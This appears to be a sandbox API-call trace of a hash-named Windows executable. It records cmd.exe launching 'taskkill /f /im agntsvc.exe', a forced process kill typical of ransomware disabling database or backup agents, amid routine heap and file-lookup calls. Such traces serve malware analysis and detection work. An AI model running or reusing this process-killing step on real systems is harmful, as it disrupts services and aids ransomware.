[0175.419] FindClose (in: hFindFile=0x410618 | out: hFindFile=0x410618) returned 1 [0175.419] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x410618 [0175.419] FindClose (in: hFindFile=0x410618 | out: hFindFile=0x410618) returned 1 [0175.419] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0175.419] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x410618 [0175.420] FindClose (in: hFindFile=0x410618 | out: hFindFile=0x410618) returned 1 [0175.420] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0175.420] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0175.420] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0175.420] GetProcessHeap () returned 0x410000 [0175.421] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x41a7b0) returned 1 [0175.421] GetEnvironmentStringsW () returned 0x417ce0* [0175.422] GetProcessHeap () returned 0x410000 [0175.422] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa76) returned 0x419d70 [0175.422] FreeEnvironmentStringsA (penv="=") returned 1 [0175.422] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0175.422] GetProcessHeap () returned 0x410000 [0175.422] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x4105c8) returned 1 [0175.422] GetProcessHeap () returned 0x410000 [0175.422] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x400e) returned 0x41bc70 [0175.423] GetProcessHeap () returned 0x410000 [0175.423] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x60) returned 0x41a7f0 [0175.423] GetProcessHeap () returned 0x410000 [0175.423] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4008) returned 0x41fc88 [0175.424] GetProcessHeap () returned 0x410000 [0175.424] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4008) returned 0x423c98 [0175.425] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0175.426] GetProcessHeap () returned 0x410000 [0175.427] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x418) returned 0x41a858 [0175.427] SetErrorMode (uMode=0x0) returned 0x8003 [0175.427] SetErrorMode (uMode=0x1) returned 0x0 [0175.427] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x41a860, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0175.427] SetErrorMode (uMode=0x8003) returned 0x1 [0175.427] GetProcessHeap () returned 0x410000 [0175.427] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x41a858, Size=0x92) returned 0x41a858 [0175.428] GetProcessHeap () returned 0x410000 [0175.428] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x41a858) returned 0x92 [0175.428] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0175.428] GetProcessHeap () returned 0x410000 [0175.428] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x62) returned 0x41a8f8 [0175.428] GetProcessHeap () returned 0x410000 [0175.428] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb8) returned 0x41a968 [0175.428] GetProcessHeap () returned 0x410000 [0175.428] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x41a968, Size=0x62) returned 0x41a968 [0175.428] GetProcessHeap () returned 0x410000 [0175.428] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x41a968) returned 0x62 [0175.428] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0175.428] GetProcessHeap () returned 0x410000 [0175.428] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xe0) returned 0x41a9d8 [0175.435] GetProcessHeap () returned 0x410000 [0175.435] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x41a9d8, Size=0x76) returned 0x41a9d8 [0175.435] GetProcessHeap () returned 0x410000 [0175.435] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x41a9d8) returned 0x76 [0175.435] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.435] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im agntsvc.exeagntsvc.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0175.436] GetLastError () returned 0x3 [0175.436] GetProcessHeap () returned 0x410000 [0175.436] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x41fc88) returned 1 [0175.437] GetProcessHeap () returned 0x410000 [0175.437] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x423c98) returned 1 [0175.438] GetProcessHeap () returned 0x410000 [0175.438] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x41bc70) returned 1 [0175.438] GetConsoleOutputCP () returned 0x1b5 [0175.439] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0175.439] GetUserDefaultLCID () returned 0x409 [0175.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0175.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0175.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0175.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0175.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0175.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0175.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0175.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0175.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0175.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0175.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0175.441] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0175.441] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0175.441] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0175.441] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0175.445] GetProcessHeap () returned 0x410000 [0175.445] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20c) returned 0x41aaa0 [0175.445] GetConsoleTitleW (in: lpConsoleTitle=0x41aaa0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0175.449] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0175.449] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0175.449] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0175.449] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0175.450] GetProcessHeap () returned 0x410000 [0175.450] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x400a) returned 0x41bc70 [0175.450] GetProcessHeap () returned 0x410000 [0175.451] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x41bc70) returned 1 [0175.452] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0175.452] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0175.452] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0175.452] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0175.452] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0175.452] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0175.452] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0175.452] GetProcessHeap () returned 0x410000 [0175.452] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x58) returned 0x41acb8 [0175.452] GetProcessHeap () returned 0x410000 [0175.453] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1a) returned 0x410578 [0175.453] GetProcessHeap () returned 0x410000 [0175.453] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x48) returned 0x41ad18 [0175.455] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0175.457] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0175.458] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0175.458] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0175.458] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0175.458] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0175.458] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0175.458] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0175.458] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0175.458] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0175.458] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0175.458] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0175.458] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0175.458] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0175.458] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0175.458] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0175.458] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0175.458] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0175.458] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0175.458] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0175.458] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0175.458] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0175.458] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0175.458] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0175.458] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0175.458] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0175.458] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0175.458] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0175.459] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0175.459] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0175.459] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0175.459] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0175.459] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0175.459] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0175.459] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0175.459] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0175.459] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0175.459] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0175.459] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0175.459] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0175.459] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0175.459] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0175.459] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0175.459] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0175.459] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0175.459] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0175.459] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0175.459] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0175.459] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0175.459] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0175.459] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0175.460] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0175.460] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0175.460] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0175.460] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0175.460] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0175.460] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0175.460] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0175.460] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0175.460] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0175.460] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0175.460] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0175.460] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0175.460] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0175.460] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0175.460] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0175.460] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0175.460] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0175.460] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0175.460] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0175.460] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0175.461] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0175.461] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0175.461] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0175.461] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0175.461] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0175.461] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0175.461] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0175.461] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0175.461] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0175.461] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0175.461] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0175.461] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0175.461] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0175.461] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0175.461] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0175.461] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0175.461] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0175.462] GetProcessHeap () returned 0x410000 [0175.462] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x210) returned 0x41ad68 [0175.462] GetProcessHeap () returned 0x410000 [0175.462] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x5a) returned 0x41af80 [0175.462] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0175.463] GetProcessHeap () returned 0x410000 [0175.463] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x418) returned 0x4105c8 [0175.463] SetErrorMode (uMode=0x0) returned 0x8003 [0175.463] SetErrorMode (uMode=0x1) returned 0x0 [0175.463] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4105d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0175.463] SetErrorMode (uMode=0x8003) returned 0x1 [0175.463] GetProcessHeap () returned 0x410000 [0175.463] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x4105c8, Size=0x56) returned 0x4105c8 [0175.463] GetProcessHeap () returned 0x410000 [0175.463] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4105c8) returned 0x56 [0175.463] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0175.463] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0175.464] GetProcessHeap () returned 0x410000 [0175.464] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x110) returned 0x41afe8 [0175.464] GetProcessHeap () returned 0x410000 [0175.464] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x218) returned 0x410628 [0175.470] GetProcessHeap () returned 0x410000 [0175.470] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x410628, Size=0x112) returned 0x410628 [0175.470] GetProcessHeap () returned 0x410000 [0175.470] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x410628) returned 0x112 [0175.470] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0175.470] GetProcessHeap () returned 0x410000 [0175.470] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xe0) returned 0x41b100 [0175.473] GetProcessHeap () returned 0x410000 [0175.473] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x41b100, Size=0x76) returned 0x41b100 [0175.473] GetProcessHeap () returned 0x410000 [0175.473] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x41b100) returned 0x76 [0175.473] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.473] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0175.474] GetLastError () returned 0x2 [0175.474] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.474] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x41b180 [0175.475] GetProcessHeap () returned 0x410000 [0175.475] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x14) returned 0x4177e8 [0175.475] FindClose (in: hFindFile=0x41b180 | out: hFindFile=0x41b180) returned 1 [0175.475] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0175.475] GetLastError () returned 0x2 [0175.475] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x41b180 [0175.475] GetProcessHeap () returned 0x410000 [0175.475] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x4177e8, Size=0x4) returned 0x41b1c0 [0175.475] FindClose (in: hFindFile=0x41b180 | out: hFindFile=0x41b180) returned 1 [0175.476] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0175.476] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0175.476] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0175.484] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0175.484] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0175.484] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x140, hStdOutput=0x144, hStdError=0x154)) [0175.485] GetProcessHeap () returned 0x410000 [0175.485] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x4177e8 [0175.485] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0175.485] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0175.485] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0175.485] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0175.485] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0175.485] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0175.485] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0175.485] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0175.485] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0175.485] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0175.485] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0175.485] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0175.485] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0175.485] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0175.485] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0175.485] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0175.486] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.486] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.486] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.486] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.486] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0175.486] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0175.486] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0175.486] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0175.486] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0175.486] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0175.486] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0175.486] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0175.486] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0175.486] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0175.486] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0175.486] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0175.486] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0175.486] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0175.486] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0175.486] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0175.486] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0175.486] GetProcessHeap () returned 0x410000 [0175.487] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x4177e8) returned 1 [0175.487] GetProcessHeap () returned 0x410000 [0175.487] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa) returned 0x41b1d0 [0175.487] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0175.493] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im agntsvc.exeagntsvc.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im agntsvc.exeagntsvc.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im agntsvc.exeagntsvc.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x11d0, dwThreadId=0xb1c)) returned 1 [0175.558] CloseHandle (hObject=0x98) returned 1 [0175.558] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0175.558] GetProcessHeap () returned 0x410000 [0175.558] RtlFreeHeap (HeapHandle=0x410000, Flags=0x0, BaseAddress=0x419d70) returned 1 [0175.559] GetEnvironmentStringsW () returned 0x419d70* [0175.559] GetProcessHeap () returned 0x410000 [0175.559] 